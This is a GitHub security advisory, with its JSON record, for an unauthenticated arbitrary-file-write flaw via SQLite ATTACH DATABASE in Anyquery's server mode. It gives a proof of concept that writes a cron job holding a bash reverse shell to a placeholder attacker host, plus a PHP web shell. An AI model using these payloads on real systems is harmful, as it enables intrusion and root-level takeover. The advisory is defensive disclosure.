GHSA-XRCF-6JH3-GGVX

Vulnerability from github – Published: 2026-07-14 18:33 – Updated: 2026-07-14 18:33
VLAI
Summary
Anyquery: Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) via Unrestricted ATTACH DATABASE in Server Mode
Details

Summary

Anyquery's server mode does not disable or restrict native SQLite disk manipulation commands. Unauthenticated attackers connecting to the MySQL-compatible server port can use the ATTACH DATABASE command to write arbitrary SQLite databases to any path on the victim's filesystem where the process has write permissions. This leads to Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) depending on the environment (e.g., by dropping a PHP web shell if a web server is running, or overwriting system cronjobs if running as root).

Details

When Anyquery is launched in Server Mode (anyquery server), it blindly proxies incoming SQL commands to the underlying SQLite engine. SQLite allows dynamic database mounting via the ATTACH DATABASE command, which creates a physical .db file on the filesystem if the file does not exist.

An attacker can connect to the open Anyquery port, attach a new database to a sensitive path (e.g., /var/www/html/shell.php, /etc/cron.d/pwn or /root/.ssh/authorized_keys), create a table, and insert a malicious payload. Although the file will contain a binary SQLite header, standard Linux services like cron, sshd, and web servers like PHP tolerate garbage data and will parse/execute the valid payload lines injected by the attacker.

PoC (Proof of Concept)

  1. Start the server on the victim machine: bash anyquery server --host 0.0.0.0 --port 8070
  2. Connect from an attacker machine: bash mysql -u root -h <VICTIM_IP> -P 8070
  3. Execute the payload to write a malicious cronjob for native RCE (Note: the Anyquery process must have write permissions to the target directory, such as /etc/cron.d or /var/spool/cron/crontabs/): sql ATTACH DATABASE '/etc/cron.d/pwn' AS pwn; CREATE TABLE pwn.task (cmd TEXT); INSERT INTO pwn.task VALUES ('* * * * * root /bin/bash -c "bash -i >& /dev/tcp/ATTACKER_IP/1337 0>&1"');

Alternatively, if a web server is running and the Anyquery process can write to the web root, you can drop a PHP shell: sql ATTACH DATABASE '/var/www/html/shell.php' AS pwn; CREATE TABLE pwn.hacked (cmd TEXT); INSERT INTO pwn.hacked VALUES ('<?php system($_GET["cmd"]); ?>');

If testing locally as a non-root user, you can verify the vulnerability by writing to /tmp: sql ATTACH DATABASE '/tmp/pwn.db' AS pwn; CREATE TABLE pwn.test (cmd TEXT); INSERT INTO pwn.test VALUES ('Hello Anyquery AFW'); Within 60 seconds, the system's cron daemon will ignore the SQLite header, parse the valid cron string, and execute the reverse shell payload with root privileges.

Impact

  • Confidentiality: None (from the write action itself, though combined with LFR it becomes High).
  • Integrity: High. Arbitrary files can be written or overwritten, which corrupts the filesystem.
  • Availability: High. Overwriting critical system files (e.g., configurations, databases) can lead to complete Denial of Service (DoS).
  • CVSS Score: 9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
  • Note: If the process is running with elevated privileges (e.g., root) or inside a web root directory, this escalates to Remote Code Execution (RCE) with a CVSS of 9.8 (Critical).

Remediation

Disable dangerous SQLite functions (ATTACH DATABASE, DETACH DATABASE, etc.) when running in Server Mode. Restrict the MySQL handler so that it only permits operations on the main database or in-memory virtual tables.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 0.4.5"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/julien040/anyquery"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-50006"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-284",
      "CWE-434",
      "CWE-73",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-14T18:33:57Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Summary\nAnyquery\u0027s `server` mode does not disable or restrict native SQLite disk manipulation commands. Unauthenticated attackers connecting to the MySQL-compatible server port can use the `ATTACH DATABASE` command to write arbitrary SQLite databases to any path on the victim\u0027s filesystem where the process has write permissions. This leads to Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) depending on the environment (e.g., by dropping a PHP web shell if a web server is running, or overwriting system cronjobs if running as root).\n\n## Details\nWhen Anyquery is launched in **Server Mode** (`anyquery server`), it blindly proxies incoming SQL commands to the underlying SQLite engine. SQLite allows dynamic database mounting via the `ATTACH DATABASE` command, which creates a physical `.db` file on the filesystem if the file does not exist.\n\nAn attacker can connect to the open Anyquery port, attach a new database to a sensitive path (e.g., `/var/www/html/shell.php`, `/etc/cron.d/pwn` or `/root/.ssh/authorized_keys`), create a table, and insert a malicious payload. Although the file will contain a binary SQLite header, standard Linux services like `cron`, `sshd`, and web servers like `PHP` tolerate garbage data and will parse/execute the valid payload lines injected by the attacker.\n\n## PoC (Proof of Concept)\n1. Start the server on the victim machine:\n   ```bash\n   anyquery server --host 0.0.0.0 --port 8070\n   ```\n2. Connect from an attacker machine:\n   ```bash\n   mysql -u root -h \u003cVICTIM_IP\u003e -P 8070\n   ```\n3. Execute the payload to write a malicious cronjob for native RCE (Note: the Anyquery process must have write permissions to the target directory, such as `/etc/cron.d` or `/var/spool/cron/crontabs/`):\n   ```sql\n   ATTACH DATABASE \u0027/etc/cron.d/pwn\u0027 AS pwn;\n   CREATE TABLE pwn.task (cmd TEXT);\n   INSERT INTO pwn.task VALUES (\u0027* * * * * root /bin/bash -c \"bash -i \u003e\u0026 /dev/tcp/ATTACKER_IP/1337 0\u003e\u00261\"\u0027);\n   ```\n\n   *Alternatively, if a web server is running and the Anyquery process can write to the web root, you can drop a PHP shell:*\n   ```sql\n   ATTACH DATABASE \u0027/var/www/html/shell.php\u0027 AS pwn;\n   CREATE TABLE pwn.hacked (cmd TEXT);\n   INSERT INTO pwn.hacked VALUES (\u0027\u003c?php system($_GET[\"cmd\"]); ?\u003e\u0027);\n   ```\n\n   *If testing locally as a non-root user, you can verify the vulnerability by writing to `/tmp`:*\n   ```sql\n   ATTACH DATABASE \u0027/tmp/pwn.db\u0027 AS pwn;\n   CREATE TABLE pwn.test (cmd TEXT);\n   INSERT INTO pwn.test VALUES (\u0027Hello Anyquery AFW\u0027);\n   ```\nWithin 60 seconds, the system\u0027s cron daemon will ignore the SQLite header, parse the valid cron string, and execute the reverse shell payload with root privileges.\n\n## Impact\n- **Confidentiality:** None (from the write action itself, though combined with LFR it becomes High).\n- **Integrity:** High. Arbitrary files can be written or overwritten, which corrupts the filesystem.\n- **Availability:** High. Overwriting critical system files (e.g., configurations, databases) can lead to complete Denial of Service (DoS).\n- **CVSS Score:** 9.1 (Critical) - `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H`\n  - *Note: If the process is running with elevated privileges (e.g., root) or inside a web root directory, this escalates to Remote Code Execution (RCE) with a CVSS of 9.8 (Critical).*\n\n## Remediation\nDisable dangerous SQLite functions (`ATTACH DATABASE`, `DETACH DATABASE`, etc.) when running in Server Mode. Restrict the MySQL handler so that it only permits operations on the main database or in-memory virtual tables.",
  "id": "GHSA-xrcf-6jh3-ggvx",
  "modified": "2026-07-14T18:33:57Z",
  "published": "2026-07-14T18:33:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/julien040/anyquery/security/advisories/GHSA-xrcf-6jh3-ggvx"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/julien040/anyquery"
    },
    {
      "type": "WEB",
      "url": "https://github.com/julien040/anyquery/releases/tag/0.4.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Anyquery: Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) via Unrestricted ATTACH DATABASE in Server Mode"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…